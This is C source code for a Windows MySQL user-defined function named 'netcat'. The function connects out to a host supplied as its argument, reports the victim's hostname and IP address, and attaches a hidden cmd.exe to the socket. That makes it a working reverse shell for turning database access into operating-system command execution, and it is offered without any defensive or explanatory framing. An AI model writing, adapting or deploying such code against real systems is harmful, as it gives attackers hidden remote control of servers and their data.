#include "shelltest.h"

EXTERN int EXPORT netcat(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if( args->arg_count != 1 )
		return 0;

	WSADATA wsaData;
	if ( WSAStartup(MAKEWORD(2, 2), &wsaData) )
		return 0;
		//Report("WSAStartup function failed", 1, true);

	if ( 2 != LOBYTE(wsaData.wVersion) || 2 != HIBYTE(wsaData.wVersion) )
		return 0;
		//Report("Incompatible version of winsock", WSAGetLastError(), true);

	SOCKET sckConnection = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if ( INVALID_SOCKET == sckConnection )
		return 0;
		//Report("Failed to create the socket sckConnection", WSAGetLastError(), true);

	struct sockaddr_in saiConnection;
	ZeroMemory(&saiConnection, sizeof(sockaddr_in));

	struct hostent *pConnectToAddress = gethostbyname(args->args[0]);
	if ( ! pConnectToAddress )
		return 0;
		//Report("Failed the gethostbyname() function", WSAGetLastError(), true);

	saiConnection.sin_addr.s_addr = ((struct in_addr *)(pConnectToAddress->h_addr))->s_addr;
	saiConnection.sin_family = AF_INET; 
	saiConnection.sin_port = htons(80); 

	if ( ! bind(sckConnection, (struct sockaddr*)&saiConnection, sizeof(saiConnection)) )
		return 0;
		//Report("Failed to bind the socket sckConnection", WSAGetLastError(), true);

	if( SOCKET_ERROR == connect(sckConnection, (SOCKADDR*) &saiConnection, sizeof(saiConnection)) )
		return 0;
		//Report("Failed to connect the socket sckConnection", WSAGetLastError(), true);

	char *chLocalHostName = (CHAR *)malloc(255);
	if ( ! chLocalHostName )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to allocate memory for chLocalHostName", GetLastError(), true);
	}

	if ( SOCKET_ERROR == gethostname(chLocalHostName, 255) )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed the gethostname() Function", WSAGetLastError(), true);
	}

	PHOSTENT pHostInfo = gethostbyname(chLocalHostName);
	if ( 0 == pHostInfo )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed the gethostbyname function to obtain the local IP address", WSAGetLastError(), true);
	}

	char * chSendData = (CHAR *)malloc(1024);
	if ( ! chSendData )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to allocate memory for chSendData", GetLastError(), true);
	}
	ZeroMemory(chSendData, 1024);

	strncat(chSendData, "\n\nReverse Exploitation...\n\n", 27);
	strncat(chSendData, "\nConnection Established\n\nHostname:   ", 42);
	strncat(chSendData, chLocalHostName, strlen(chLocalHostName));
	strncat(chSendData, "\nIP Address: ", 13);
	strncat(chSendData, inet_ntoa (*(struct in_addr *)*pHostInfo->h_addr_list), strlen(inet_ntoa (*(struct in_addr *)*pHostInfo->h_addr_list)));
	strncat(chSendData, "\n\n", 2);

	free(chLocalHostName);
	chLocalHostName = 0;

	if ( SOCKET_ERROR == send(sckConnection, chSendData, strlen(chSendData), 0) )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to send initial data", WSAGetLastError(), true);
	}

	free(chSendData);
	chSendData = 0;

	SECURITY_ATTRIBUTES saSecurityAttributes;
	ZeroMemory(&saSecurityAttributes, sizeof(SECURITY_ATTRIBUTES));

	saSecurityAttributes.nLength = sizeof(saSecurityAttributes);
    	saSecurityAttributes.lpSecurityDescriptor = NULL;
    	saSecurityAttributes.bInheritHandle = TRUE;

	HANDLE hStdInRead = 0, hStdInWrite = 0;
	if( ! CreatePipe(&hStdInRead, &hStdInWrite, &saSecurityAttributes, 0) )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to Failed to create first pipe", GetLastError(), true);
	}

	HANDLE hStdOutRead = 0, hStdOutWrite = 0;
	if( ! CreatePipe(&hStdOutRead, &hStdOutWrite, &saSecurityAttributes, 0) )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to Failed to create second pipe", GetLastError(), true);
	}

	THREAD_PARAM tpSOThreadParam;
	ZeroMemory(&tpSOThreadParam, sizeof(THREAD_PARAM));

	tpSOThreadParam.hPipeHandle = hStdOutRead;
	tpSOThreadParam.sSocket = sckConnection;

	DWORD dwSOThreadID = 0;
	HANDLE hSOThread = CreateThread(&saSecurityAttributes, 0, (LPTHREAD_START_ROUTINE)ProcessOutThread, &tpSOThreadParam, 0, &dwSOThreadID) ;
	if ( ! hSOThread )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to Create SO Thread", GetLastError(), true);
	}

	THREAD_PARAM tpSIThreadParam;
	ZeroMemory(&tpSIThreadParam, sizeof(THREAD_PARAM));
	tpSIThreadParam.hPipeHandle = hStdInWrite;
	tpSIThreadParam.sSocket = sckConnection;

	DWORD dwSIThreadID = 0;
	HANDLE hSIThread = CreateThread(&saSecurityAttributes, 0, (LPTHREAD_START_ROUTINE)ProcessInThread, &tpSIThreadParam, 0, &dwSIThreadID) ;
	if ( ! hSIThread )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to Create SI Thread", GetLastError(), true);
	}

	STARTUPINFO siProcStartupInfo;
	ZeroMemory(&siProcStartupInfo, sizeof(STARTUPINFO));

	GetStartupInfo(&siProcStartupInfo);

	siProcStartupInfo.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
	siProcStartupInfo.hStdInput = hStdInRead;
	siProcStartupInfo.hStdOutput = hStdOutWrite;
	siProcStartupInfo.hStdError = hStdOutWrite;
	siProcStartupInfo.wShowWindow = SW_HIDE;	// stop the shell window showing

	PROCESS_INFORMATION piProcInfo;
	ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));

	if( ! CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &siProcStartupInfo, &piProcInfo) ) 
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to spawn cmd.exe", GetLastError(), true);
	}

	HANDLE hHandleArray[3];
    	hHandleArray[0] = hSOThread;
    	hHandleArray[1] = hSIThread;
    	hHandleArray[2] = piProcInfo.hProcess;

	switch(WaitForMultipleObjectsEx(3, hHandleArray, false, INFINITE, false))
	{
		case (WAIT_OBJECT_0 + 0):
			TerminateThread(hSIThread, 0);
			TerminateProcess(piProcInfo.hProcess, 1);
			break;

		case (WAIT_OBJECT_0 + 1):
			TerminateThread(hSOThread, 0);
			TerminateProcess(piProcInfo.hProcess, 1);
			break;

		case (WAIT_OBJECT_0 + 2):
			TerminateThread(hSIThread, 0);
			TerminateThread(hSOThread, 0);

		default:
			closesocket(sckConnection);

			return 0;
			//Report("The WaitForMiltipleObjectsEx function returned an error", GetLastError(), true);
	}

	if ( SOCKET_ERROR == send(sckConnection, "\n\nConnection Terminated...\n\n", 28, 0) )
	{
		closesocket(sckConnection);
		return 0;
		//Report("Failed to send the connection terminated message", WSAGetLastError(), true);
	}

	closesocket(sckConnection);
	WSACleanup();

	return(0);
}

static VOID ProcessInThread(PTHREAD_PARAM ptpParam)
{

	char *chRecieveBuffer = (CHAR *)malloc(1);
	ZeroMemory(chRecieveBuffer, sizeof(chRecieveBuffer));

	DWORD dwBytesWritten = 0;

	while ( SOCKET_ERROR != recv(ptpParam->sSocket, chRecieveBuffer, 1, 0) )
	{
		if ( ! WriteFile(ptpParam->hPipeHandle, chRecieveBuffer, 1, &dwBytesWritten, NULL) )
			ExitThread(GetLastError());

		ZeroMemory(chRecieveBuffer, sizeof(chRecieveBuffer));
	}

	free(chRecieveBuffer);

	ExitThread(0);
}

static VOID ProcessOutThread(PTHREAD_PARAM ptpParam)
{

	DWORD dwBytesAvailable = 0;
	DWORD dwBytesRead = 0;

	char *chReadPipeBuffer = (CHAR *)malloc(READ_PIPE_BUFFER_SIZE);
	ZeroMemory(chReadPipeBuffer, READ_PIPE_BUFFER_SIZE);

	while(1)
	{
		if ( ! PeekNamedPipe(ptpParam->hPipeHandle, NULL, 0, NULL, &dwBytesAvailable, NULL) )
			ExitThread(GetLastError());

		while ( 0 != dwBytesAvailable ) 
		{
			if ( (READ_PIPE_BUFFER_SIZE) < dwBytesAvailable )
			{
				if ( ! ReadFile(ptpParam->hPipeHandle, chReadPipeBuffer, READ_PIPE_BUFFER_SIZE, &dwBytesRead, NULL) )
					ExitThread(GetLastError());
			}
			else
			{
				if ( ! ReadFile(ptpParam->hPipeHandle, chReadPipeBuffer, dwBytesAvailable, &dwBytesRead, NULL) )
					ExitThread(GetLastError());
			}

			if ( ! send(ptpParam->sSocket, chReadPipeBuffer, dwBytesRead, 0) )
				ExitThread(GetLastError());

			dwBytesAvailable = (dwBytesAvailable - dwBytesRead);
			ZeroMemory(chReadPipeBuffer, sizeof(READ_PIPE_BUFFER_SIZE));
		}

		SleepEx(READ_PIPE_LOOP_SLEEP_TIME, false);
	} 
	ExitThread(0);
}

void Report(LPTSTR lpErrorMessage, DWORD dwErrorCode, BOOL bTerminateProcess)
{
	WSACleanup();
	if ( bTerminateProcess )
		ExitProcess(dwErrorCode);
}

EXTERN char EXPORT netcat_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
	return 0;
}
